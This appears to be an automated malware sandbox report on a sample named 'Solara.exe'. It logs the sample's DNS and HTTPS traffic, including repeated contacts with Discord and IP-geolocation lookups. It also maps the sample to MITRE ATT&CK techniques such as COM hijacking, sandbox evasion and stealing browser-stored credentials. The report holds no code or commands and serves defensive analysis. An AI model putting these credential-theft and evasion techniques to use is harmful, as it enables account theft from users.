8.8.8.8:53

cdn.localizeapi.com

dns

65 B
113 B
1
1

DNS Request

cdn.localizeapi.com

DNS Response

104.22.20.64

172.67.41.53

104.22.21.64
8.8.8.8:53

cdn.localizeapi.com

dns

65 B
158 B
1
1

DNS Request

cdn.localizeapi.com
104.18.160.117:443

cdn.prod.website-files.com

https

71.5kB
5.0MB
613
4278
104.22.20.64:443

cdn.localizeapi.com

https

5.6kB
33.2kB
21
33
8.8.8.8:53

232.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.135.159.162.in-addr.arpa
8.8.8.8:53

117.160.18.104.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

117.160.18.104.in-addr.arpa
8.8.8.8:53

64.20.22.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

64.20.22.104.in-addr.arpa
8.8.8.8:53

3.200.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.200.250.142.in-addr.arpa
8.8.8.8:53

10.180.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

10.180.250.142.in-addr.arpa
8.8.8.8:53

d3e54v103j8qbb.cloudfront.net

dns

75 B
139 B
1
1

DNS Request

d3e54v103j8qbb.cloudfront.net

DNS Response

18.245.246.158

18.245.246.114

18.245.246.167

18.245.246.151
8.8.8.8:53

d3e54v103j8qbb.cloudfront.net

dns

75 B
162 B
1
1

DNS Request

d3e54v103j8qbb.cloudfront.net
104.18.160.117:443

cdn.prod.website-files.com

https

11.6kB
195.0kB
69
173
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.133.233

162.159.130.233

162.159.135.233

162.159.134.233

162.159.129.233
8.8.8.8:53

cdn.discordapp.com

dns

64 B
113 B
1
1

DNS Request

cdn.discordapp.com
162.159.133.233:443

cdn.discordapp.com

https

30.6kB
563.3kB
141
502
8.8.8.8:53

158.246.245.18.in-addr.arpa

dns

73 B
130 B
1
1

DNS Request

158.246.245.18.in-addr.arpa
8.8.8.8:53

233.133.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.133.159.162.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

geolocation.onetrust.com

dns

70 B
102 B
1
1

DNS Request

geolocation.onetrust.com

DNS Response

172.64.155.119

104.18.32.137
8.8.8.8:53

geolocation.onetrust.com

dns

70 B
140 B
1
1

DNS Request

geolocation.onetrust.com
8.8.8.8:53

232.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

232.187.250.142.in-addr.arpa
8.8.8.8:53

119.155.64.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

119.155.64.172.in-addr.arpa
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.137.232

162.159.135.232

162.159.136.232

162.159.138.232

162.159.128.233
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.136.232

162.159.128.233

162.159.137.232

162.159.138.232
8.8.8.8:53

remote-auth-gateway.discord.gg

dns

76 B
156 B
1
1

DNS Request

remote-auth-gateway.discord.gg

DNS Response

162.159.135.234

162.159.134.234

162.159.133.234

162.159.136.234

162.159.130.234
8.8.8.8:53

remote-auth-gateway.discord.gg

dns

76 B
122 B
1
1

DNS Request

remote-auth-gateway.discord.gg
8.8.8.8:53

234.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.135.159.162.in-addr.arpa
8.8.8.8:53

js.hcaptcha.com

dns

61 B
93 B
1
1

DNS Request

js.hcaptcha.com

DNS Response

104.19.230.21

104.19.229.21
8.8.8.8:53

js.hcaptcha.com

dns

61 B
98 B
1
1

DNS Request

js.hcaptcha.com
104.19.230.21:443

js.hcaptcha.com

https

6.4kB
58.9kB
33
58
8.8.8.8:53

21.230.19.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

21.230.19.104.in-addr.arpa
8.8.8.8:53

newassets.hcaptcha.com

dns

68 B
100 B
1
1

DNS Request

newassets.hcaptcha.com

DNS Response

104.19.230.21

104.19.229.21
8.8.8.8:53

newassets.hcaptcha.com

dns

68 B
105 B
1
1

DNS Request

newassets.hcaptcha.com
8.8.8.8:53

newassets.hcaptcha.com

dns

68 B
100 B
1
1

DNS Request

newassets.hcaptcha.com

DNS Response

104.19.230.21

104.19.229.21
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.128.233

162.159.137.232

162.159.138.232

162.159.135.232
8.8.8.8:53

newassets.hcaptcha.com

dns

68 B
100 B
1
1

DNS Request

newassets.hcaptcha.com

DNS Response

104.19.229.21

104.19.230.21
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.137.232

162.159.138.232

162.159.128.233

162.159.135.232
104.19.230.21:443

newassets.hcaptcha.com

https

56.7kB
581.8kB
139
513
8.8.8.8:53

api.hcaptcha.com

dns

62 B
94 B
1
1

DNS Request

api.hcaptcha.com

DNS Response

104.19.229.21

104.19.230.21
8.8.8.8:53

api.hcaptcha.com

dns

62 B
99 B
1
1

DNS Request

api.hcaptcha.com
8.8.8.8:53

stun.l.google.com

dns

63 B
79 B
1
1

DNS Request

stun.l.google.com

DNS Response

74.125.250.129
8.8.8.8:53

stun.l.google.com

dns

63 B
91 B
1
1

DNS Request

stun.l.google.com

DNS Response

2001:4860:4864:5:8000::1
8.8.8.8:53

stun.l.google.com

dns

63 B
91 B
1
1

DNS Request

stun.l.google.com

DNS Response

2001:4860:4864:5:8000::1
74.125.250.129:19302

stun.l.google.com

48 B
60 B
1
1
8.8.8.8:53

129.250.125.74.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

129.250.125.74.in-addr.arpa
104.19.229.21:443

api.hcaptcha.com

https

4.8kB
8.4kB
11
13
8.8.8.8:53

21.229.19.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

21.229.19.104.in-addr.arpa
8.8.8.8:53

gateway.discord.gg

dns

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.136.234

162.159.133.234

162.159.134.234

162.159.135.234

162.159.130.234
8.8.8.8:53

gateway.discord.gg

dns

64 B
110 B
1
1

DNS Request

gateway.discord.gg
8.8.8.8:53

234.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.136.159.162.in-addr.arpa
8.8.8.8:53

status.discord.com

dns

64 B
144 B
1
1

DNS Request

status.discord.com

DNS Response

162.159.135.232

162.159.137.232

162.159.128.233

162.159.138.232

162.159.136.232
8.8.8.8:53

status.discord.com

dns

64 B
113 B
1
1

DNS Request

status.discord.com
162.159.135.232:443

status.discord.com

https

6.0kB
10.3kB
15
18
162.159.133.233:443

cdn.discordapp.com

https

19.7kB
1.4MB
187
1142
8.8.8.8:53

media.discordapp.net

dns

66 B
146 B
1
1

DNS Request

media.discordapp.net

DNS Response

162.159.128.232

162.159.129.232

162.159.133.232

162.159.134.232

162.159.130.232
8.8.8.8:53

media.discordapp.net

dns

66 B
115 B
1
1

DNS Request

media.discordapp.net
162.159.128.232:443

media.discordapp.net

https

5.0kB
7.6kB
10
12
8.8.8.8:53

232.128.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.128.159.162.in-addr.arpa
8.8.8.8:53

90.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

90.65.42.20.in-addr.arpa
8.8.8.8:53

a.nel.cloudflare.com

dns

66 B
82 B
1
1

DNS Request

a.nel.cloudflare.com

DNS Response

35.190.80.1
8.8.8.8:53

a.nel.cloudflare.com

dns

66 B
117 B
1
1

DNS Request

a.nel.cloudflare.com
35.190.80.1:443

a.nel.cloudflare.com

https

2.9kB
5.1kB
5
7
8.8.8.8:53

1.80.190.35.in-addr.arpa

dns

70 B
120 B
1
1

DNS Request

1.80.190.35.in-addr.arpa
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.137.232

162.159.128.233

162.159.138.232

162.159.136.232

162.159.135.232
162.159.135.232:443

discord.com

https

12.2kB
25.9kB
25
32
8.8.8.8:53

232.137.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.137.159.162.in-addr.arpa
88.221.135.33:443

www.bing.com

https

3.0kB
3.5kB
7
10
8.8.8.8:53

33.135.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

33.135.221.88.in-addr.arpa
8.8.8.8:53

ip4.seeip.org

dns

Solara.exe

59 B
75 B
1
1

DNS Request

ip4.seeip.org

DNS Response

23.128.64.141
8.8.8.8:53

ip-api.com

dns

Solara.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.137.232

162.159.136.232

162.159.135.232

162.159.128.233

162.159.138.232
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.135.233

162.159.130.233

162.159.133.233

162.159.129.233

162.159.134.233
8.8.8.8:53

cdn.discordapp.com

dns

64 B
113 B
1
1

DNS Request

cdn.discordapp.com
162.159.135.233:443

cdn.discordapp.com

https

5.1kB
5.3kB
10
10
8.8.8.8:53

233.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.135.159.162.in-addr.arpa
2.17.209.34:443

www.bing.com

https

11.6kB
29.6kB
68
86
8.8.8.8:53

34.209.17.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

34.209.17.2.in-addr.arpa
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.128.233

162.159.136.232

162.159.138.232

162.159.137.232

162.159.135.232
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
106 B
1
1

DNS Request

discord.com
162.159.128.233:443

discord.com

https

6.6kB
4.9kB
11
11
8.8.8.8:53

233.128.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.128.159.162.in-addr.arpa
162.159.128.233:443

discord.com

https

7.0kB
4.7kB
12
11
92.123.142.25:443

www.bing.com

https

3.0kB
3.6kB
7
11
8.8.8.8:53

25.142.123.92.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

25.142.123.92.in-addr.arpa
92.123.142.25:443

www.bing.com

https

4.0kB
4.1kB
7
11
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.138.232

162.159.128.233

162.159.135.232

162.159.137.232
8.8.8.8:53

discord.com

dns

Solara.exe

57 B
106 B
1
1

DNS Request

discord.com
162.159.136.232:443

discord.com

https

7.0kB
4.7kB
12
11
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion